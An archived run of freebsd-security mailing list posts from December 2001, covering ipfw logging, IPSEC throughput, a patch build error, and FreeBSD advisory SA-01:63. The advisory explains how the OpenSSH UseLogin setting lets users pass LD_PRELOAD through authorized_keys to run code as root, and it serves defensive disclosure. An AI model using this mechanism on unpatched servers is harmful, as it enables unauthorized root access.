Dec  4 14:15:30 server /kernel: ipfw: 3200 Deny ICMP:8.0 210.90.188.221
192.168.1.224 in via xl0
Dec  4 14:15:30 server /kernel: ipfw: 3200 Deny ICMP:8.0 210.90.188.221
192.168.1.224 in via xl0
Dec  4 14:15:30 server /kernel: ipfw: limit reached on rule #3200

Now, after a installed FreeBSD-4.3, it just show me:
ipfw: limit reached on rule #3200

I have looked in the security check output diary mail and /var/log/messages
file.

I have included the follow options:

- Kernel
   options IPFIREWALL
   options IPFIREWALL_VERBOSE
   options IPFIREWALL_VERBOSE_LIMIT=500
   options IPFIREWALL_DEFAULT_TO_ACCEPT

- /etc/rc.conf
    firewall_enable="YES"
    firewall_logging="YES"

- Ipfw rules
    The rules that deny some service are seted with deny log option.

Does anybody could help me to get a more detailed log?

Thank�s to all.

Ronan


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  9: 3:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from warez.scriptkiddie.org (uswest-dsl-142-38.cortland.com [209.162.142.38])
	by hub.freebsd.org (Postfix) with ESMTP id 6310C37B417
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 09:03:30 -0800 (PST)
Received: from [192.168.69.11] (unknown [192.168.69.11])
	by warez.scriptkiddie.org (Postfix) with ESMTP
	id 6FB2862D01; Tue,  4 Dec 2001 09:03:29 -0800 (PST)
Date: Tue, 4 Dec 2001 09:03:50 -0800 (PST)
From: Lamont Granquist <lamont@scriptkiddie.org>
To: Trent Tobias <tritttrott@yahoo.com>
Cc: <freebsd-security@freebsd.org>
Subject: Re: Speeding up IPSEC Gateway
In-Reply-To: <20011204124735.46928.qmail@web21206.mail.yahoo.com>
Message-ID: <20011204090242.B18024-100000@coredump.scriptkiddie.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


try a recent STABLE from yesterday or today.  someone broke TCP in 4.4 and
it only recently got fixed.  see recent threads in freebsd-hackers for
more information.

On Tue, 4 Dec 2001, Trent Tobias wrote:
> I currently have 3 IPSEC Gateways set up with
> 4.4-STABLE running on 1.5GHz machines.  It is a fully
> meshed setup (all is connected to all via IPSEC ESP
> Tunnels, using gif).
>
> All three boxes have 128kbit connections to the
> internet, but it seems like my maximum connection
> speed between my 3 local nets only reaches approx
> 30kbits/s (i use bing to determine this).
>
> I realise that encryption/decryption takes its toll in
> the kernel relaying the packets, but this slow?
>
> My only guess is that I am using the wrong parameters
> for encryption - I am using the default config for
> racoon with longer (8 hours) key lifetimes.
>
> Trent
>
> __________________________________________________
> Do You Yahoo!?
> Buy the perfect holiday gifts at Yahoo! Shopping.
> http://shopping.yahoo.com
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  9:10:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23])
	by hub.freebsd.org (Postfix) with ESMTP id 05A7E37B416
	for <security@FreeBSD.ORG>; Tue,  4 Dec 2001 09:10:21 -0800 (PST)
Received: from fazendinha (ressacada.melim.com.br [200.215.110.4])
	by salseiros.melim.com.br (Postfix) with SMTP
	id 05A86BA8F; Tue,  4 Dec 2001 15:10:08 -0200 (BRST)
Message-ID: <23ee01c17ce6$c965d160$2aa8a8c0@melim.com.br>
From: "Ronan Lucio" <ronan@melim.com.br>
To: "Dmitry P. Smirnov" <dimpro@muh.ru>, <security@FreeBSD.ORG>
References: <006001c17cdf$ab181d00$04e3a8c0@beco.hu> <008d01c17ce3$910c08f0$04e3a8c0@beco.hu> <10f701c17ce0$56141600$2aa8a8c0@melim.com.br> <000701c17ce2$38949800$0700a8c0@home>
Subject: Re: Attack logs
Date: Tue, 4 Dec 2001 15:11:58 -0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


> Maybe you need to try your [/var/log/]security  log file?

Thank you very much friends.
That�s it.

Ronan


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  9:11:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP
	id C602637B417; Tue,  4 Dec 2001 09:11:11 -0800 (PST)
Received: (from nectar@localhost)
	by freefall.freebsd.org (8.11.6/8.11.6) id fB4HBBw03323;
	Tue, 4 Dec 2001 09:11:11 -0800 (PST)
	(envelope-from security-advisories@freebsd.org)
Date: Tue, 4 Dec 2001 09:11:11 -0800 (PST)
Message-Id: <200112041711.fB4HBBw03323@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f
From: FreeBSD Security Advisories <security-advisories@freebsd.org>
To: FreeBSD Security Advisories <security-advisories@freebsd.org>
Reply-To: security-advisories@freebsd.org
Subject: FreeBSD Security Advisory: FreeBSD-SA-01:63.openssh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:63                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          OpenSSH UseLogin directive permits privilege escalation

Category:       core/ports
Module:         openssh
Announced:      2001-12-02
Credits:        Markus Friedl <markus@OpenBSD.org>
Affects:        FreeBSD 4.3-RELEASE, 4.4-RELEASE
                FreeBSD 4.4-STABLE prior to the correction date
                Ports collection prior to the correction date
Corrected:      2001-12-03 00:53:28 UTC (RELENG_4)
                2001-12-03 00:54:18 UTC (RELENG_4_4)
                2001-12-03 00:54:54 UTC (RELENG_4_3)
                2001-12-02 06:52:40 UTC (openssh port)
FreeBSD only:   NO

I.   Background

OpenSSH is an implementation of the SSH1 and SSH2 secure shell
protocols for providing encrypted and authenticated network access,
which is available free for unrestricted use. Versions of OpenSSH are
included in the FreeBSD ports collection and the FreeBSD base system.

II.  Problem Description

OpenSSH includes a feature by which a user can arrange for
environmental variables to be set depending upon the key used for
authentication.  These environmental variables are specified in the
`authorized_keys' (SSHv1) or `authorized_keys2' (SSHv2) files in the
user's home directory on the server.  This is normally safe, as this
environment is passed only to the user's shell, which is invoked with
user privileges.

However, when the OpenSSH server `sshd' is configured to use
the system's login program (via the directive `UseLogin yes' in
sshd_config), this environment is passed to login, which is invoked
with superuser privileges.  Because certain environmental variables
such as LD_LIBRARY_PATH and LD_PRELOAD can be set using the previously
described feature, the user may arrange for login to execute arbitrary
code with superuser privileges.

All versions of FreeBSD 4.x prior to the correction date including
FreeBSD 4.3 and 4.4 are potentially vulnerable to this problem.
However, the OpenSSH server is configured to not use the system login
program (`UseLogin no') by default, and is therefore not vulnerable
unless the system administrator has changed this setting.

In addition, there are two versions of OpenSSH included in the
ports collection.  One is ports/security/openssh, which is the
BSD-specific version of OpenSSH.  Versions of this port prior to
openssh-3.0.2 exhibit the problem described above.  The other is
ports/security/openssh-portable, which is not vulnerable, even if the
server is set to `UseLogin yes'.

III. Impact

Hostile but otherwise legitimate users that can successfully
authenticate using public key authentication may cause /usr/bin/login
to run arbitrary code as the superuser.

If you have not enabled the 'UseLogin' directive in the sshd
configuration file, you are not vulnerable to this problem.

IV.  Workaround

Doing one of the following will eliminate the vulnerability:

1) Configure sshd to not use the system login program.  Edit the
   server configuration file and change any `UseLogin' directives
   to `UseLogin no'.  This is the preferred workaround.

2) If for whatever reason, disabling `UseLogin' is not possible,
   then one can instead disable public key authentication.  Edit the
   server configuration file and change any `RSAAuthentication',
   `DSAAuthentication', or `PubKeyAuthentication' directives
   to `RSAAuthentication no', `DSAAuthentication no', and
   `PubKeyAuthentication no', respectively.

For sshd included in the base system (/usr/bin/sshd), the
server configuration file is `/etc/ssh/sshd_config'.  For sshd
from the ports collection, the server configuration file is
`/usr/local/etc/sshd_config'.

After modifying the sshd configuration file, the sshd daemon must be
restarted by executing the following command as root:

# kill -HUP `cat /var/run/sshd.pid`

V.   Solution

1) Upgrade the vulnerable system to 4.3-RELEASEp21, 4.4-RELEASEp1, or
4.4-STABLE after the correction date, or patch your current system
source code and rebuild.

2) FreeBSD 4.x systems prior to the correction date:

The following patch has been verified to apply to FreeBSD
4.3-RELEASE, 4.4-RELEASE, and 4.4-STABLE dated prior to the
correction date.  It may or may not apply to older, unsupported
versions of FreeBSD.

Download the patch and the detached PGP signature from the following
locations, and verify the signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:63/sshd.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:63/sshd.patch.asc

Execute the following commands as root:

# cd /usr/src/crypto/openssh
# patch < /path/to/sshd.patch
# cd /usr/src/secure/usr.sbin/sshd
# make depend && make all install

3) FreeBSD 4.4-RELEASE systems:

An experimental upgrade package is available for users who wish to
provide testing and feedback on the binary upgrade process.  This
package may be installed on FreeBSD 4.4-RELEASE systems only, and is
intended for use on systems for which source patching is not practical
or convenient.

If you use the upgrade package, feedback (positive or negative) to
security-officer@FreeBSD.org is requested so we can improve the
process for future advisories.

During the installation procedure, backup copies are made of the files
which are replaced by the package.  These backup copies will be
reinstalled if the package is removed, reverting the system to a
pre-patched state.  In addition, the package automatically restarts
the sshd daemon if it is running.

Three versions of the upgrade package are available, depending on
whether or not the system has the kerberosIV or kerberos5
distributions installed.

3a) For systems without kerberosIV or kerberos5 installed:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-01.63.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-01.63.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-sshd-01.63.tgz

3b) For systems with kerberosIV only installed:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-01.63.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-01.63.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-sshd-kerberosIV-01.63.tgz

3c) For systems with kerberos5 only installed:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberos5-01.63.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberos5-01.63.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-sshd-kerberos5-01.63.tgz

3d) For systems with both kerberosIV and kerberos5 installed:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-kerberos5-01.63.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-kerberos5-01.63.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-sshd-kerberosIV-kerberos5-01.63.tgz

[Ports collection]

One of the following:

1) Upgrade your entire ports collection and rebuild the OpenSSH port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/security/openssh-3.0.2.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/security/openssh-3.0.2.tgz

[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources.

NOTE: It may be several days before updated packages are available. Be
sure to check the file creation date on the package, because the
version number of the software has not changed.

3) Download a new port skeleton for the openssh port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz

VI. Correction details

Path                                                             Revision
  Branch
- -------------------------------------------------------------------------
src/crypto/openssh/session.c
  HEAD                                                               1.18
  RELENG_4                                                       1.4.2.11
  RELENG_4_4                                                  1.4.2.8.4.1
  RELENG_4_3                                                  1.4.2.8.2.1
src/crypto/openssh/version.h
  HEAD                                                                1.9
  RELENG_4                                                    1.1.1.1.2.7
  RELENG_4_4                                              1.1.1.1.2.5.2.1
  RELENG_4_3                                              1.1.1.1.2.4.2.1
ports/security/openssh/Makefile                                      1.79
- -------------------------------------------------------------------------

For OpenSSH included in the base system, there is a version string
indicating which FreeBSD localizations are available.  The following
table lists the version strings for each branch which include this
security fix:

Branch                                                     Version string
- -------------------------------------------------------------------------
HEAD                         OpenSSH_2.9 FreeBSD localisations 20011202
RELENG_4                     OpenSSH_2.9 FreeBSD localisations 20011202
RELENG_4_4                   OpenSSH_2.3.0 FreeBSD localisations 20011202
RELENG_4_3                   OpenSSH_2.3.0 green@FreeBSD.org 20011202
- -------------------------------------------------------------------------

To view the version string of the OpenSSH server, execute the following
command:

  % /usr/sbin/sshd -\?

The version string is also displayed when a client connects to the
server.

VII. References

<URL:http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c#rev1.110>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBPAz4rlUuHi5z0oilAQGNBwQAl68aZL6hfJaeAFlNlKwrARJ2XgwjkII2
q6Nir5KFgeYkPilDdElua81MU5FxUgSyYYBLADRrtyht6otqmK8u5GZJMrKPXadi
ys3nnqH/LYYREe2RVYmzXOSgjn2q0rqm9zNgYoddQjbTnpRxRq//SuOMVTRoYlJC
5QznzsMiK1U=
=XSLb
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  9:42:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66])
	by hub.freebsd.org (Postfix) with ESMTP
	id 45D5737B420; Tue,  4 Dec 2001 09:41:02 -0800 (PST)
Received: (from str@localhost)
	by giganda.komkon.org (8.11.3/8.11.3) id fB4Hf1m08039;
	Tue, 4 Dec 2001 12:41:01 -0500 (EST)
	(envelope-from str)
Date: Tue, 4 Dec 2001 12:41:01 -0500 (EST)
From: Igor Roshchin <str@giganda.komkon.org>
Message-Id: <200112041741.fB4Hf1m08039@giganda.komkon.org>
To: security-officer@freebsd.org
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:63.openssh
Cc: security@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


Hello!

I just tried to apply the patch to 4.3-RELEASE.
The patch applied cleanly, but it stopped with a compilation error,
not finding one of the libraries:

cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbi
n/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA
 -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\"  -o sshd sshd.o auth-rhosts.o auth-passwd
.o auth-rsa.o auth-rh-rsa.o pty.o log-server.o login.o servconf.o serverloop.o a
uth.o auth1.o auth2.o auth-options.o session.o login_access.o dh.o auth-pam.o  -
lopie -lmd -L/usr/src/secure/usr.sbin/sshd/../../lib/libssh -lssh -lcrypt -lcryp
to -lutil -lz -lwrap  -lpam
/usr/libexec/elf/ld: cannot find -lssh
*** Error code 1

Stop in /usr/src/secure/usr.sbin/sshd.

A full transcript follows.

It looks like it does not do make in /usr/src/secure/lib/libssh.
    cd /usr/src/secure/lib/libssh 
    make depend && make all
did the job.


Igor


 [12:24] [807] ...src/crypto/openssh#patch < sshd.patch
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|===================================================================
|RCS file: /c/ncvs/src/crypto/openssh/session.c,v
|retrieving revision 1.4.2.10
|retrieving revision 1.4.2.11
|diff -u -p -r1.4.2.10 -r1.4.2.11
|--- src/crypto/openssh/session.c       2001/11/21 10:45:15     1.4.2.10
|+++ src/crypto/openssh/session.c       2001/12/03 00:53:28     1.4.2.11
--------------------------
Patching file session.c using Plan A...
Hunk #1 succeeded at 1118 (offset -36 lines).
Hunk #2 succeeded at 1131 (offset -36 lines).
done
 [12:24] [808] ...src/crypto/openssh# cd /usr/src/secure/usr.sbin/sshd  
 [12:24] [809] ...secure/usr.sbin/sshd#make depend && make all install
rm -f .depend
mkdep -f .depend -a    -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secu
re/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -
DNO_IDEA -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\"  /usr/src/secure/usr.sbin/sshd/..
/../../crypto/openssh/sshd.c /usr/src/secure/usr.sbin/sshd/../../../crypto/opens
sh/auth-rhosts.c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-pass
wd.c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-rsa.c /usr/src/s
ecure/usr.sbin/sshd/../../../crypto/openssh/auth-rh-rsa.c /usr/src/secure/usr.sb
in/sshd/../../../crypto/openssh/pty.c /usr/src/secure/usr.sbin/sshd/../../../cry
pto/openssh/log-server.c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/l
ogin.c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/servconf.c /usr/src
/secure/usr.sbin/sshd/../../../crypto/openssh/serverloop.c /usr/src/secure/usr.s
bin/sshd/../../../crypto/openssh/auth.c /usr/src/secure/usr.sbin/sshd/../../../c
rypto/openssh/auth1.c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth
2.c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-options.c /usr/sr
c/secure/usr.sbin/sshd/../../../crypto/openssh/session.c /usr/src/secure/usr.sbi
n/sshd/../../../usr.bin/login/login_access.c /usr/src/secure/usr.sbin/sshd/../..
/../crypto/openssh/dh.c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/au
th-pam.c
cd /usr/src/secure/usr.sbin/sshd; make _EXTRADEPEND
echo sshd: /usr/lib/libc.a /usr/lib/libopie.a /usr/lib/libmd.a /usr/lib/libcrypt.a /usr/lib/libcrypto.a /usr/lib/libutil.a /usr/lib/libz.a /usr/lib/libwrap.a /usr/lib/libpam.a >> .depend
Warning: Object directory not changed from original /usr/src/secure/usr.sbin/sshd
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/sshd.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-rhosts.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-passwd.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-rsa.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-rh-rsa.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/pty.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/log-server.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/login.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/servconf.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/serverloop.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth1.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth2.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-options.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/session.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../usr.bin/login/login_access.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/dh.c
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\" -c /usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-pam.c
/usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-pam.c: In function `pamconv':
/usr/src/secure/usr.sbin/sshd/../../../crypto/openssh/auth-pam.c:109: warning: passing arg 1 of `read_passphrase' discards qualifiers from pointer target type
cc -O -pipe  -DLIBWRAP -DHAVE_LOGIN_CAP -DLOGIN_ACCESS -I/usr/src/secure/usr.sbin/sshd/../../../usr.bin/login -DUSE_PAM -DHAVE_PAM_GETENVLIST -DSKEY -DNO_IDEA   -DXAUTH_PATH=\"/usr/X11R6/bin/xauth\"  -o sshd sshd.o auth-rhosts.o auth-passwd.o auth-rsa.o auth-rh-rsa.o pty.o log-server.o login.o servconf.o serverloop.o auth.o auth1.o auth2.o auth-options.o session.o login_access.o dh.o auth-pam.o  -lopie -lmd -L/usr/src/secure/usr.sbin/sshd/../../lib/libssh -lssh -lcrypt -lcrypto -lutil -lz -lwrap  -lpam
/usr/libexec/elf/ld: cannot find -lssh
*** Error code 1

Stop in /usr/src/secure/usr.sbin/sshd.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 10:24:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flag.blackened.net (flag.blackened.net [216.240.44.56])
	by hub.freebsd.org (Postfix) with ESMTP
	id 5CE4D37B428; Tue,  4 Dec 2001 10:24:09 -0800 (PST)
Received: by flag.blackened.net (Postfix, from userid 1000)
	id 0B78A6831; Tue,  4 Dec 2001 10:24:09 -0800 (PST)
To: cjc@FreeBSD.ORG, peter.jeremy@alcatel.com.au
Subject: Re: OPIE mailing list
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <20011204005211.B37981@blossom.cjclark.org>
Message-Id: <20011204182409.0B78A6831@flag.blackened.net>
Date: Tue,  4 Dec 2001 10:24:09 -0800 (PST)
From: daver@flag.blackened.net (Pomegranate)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
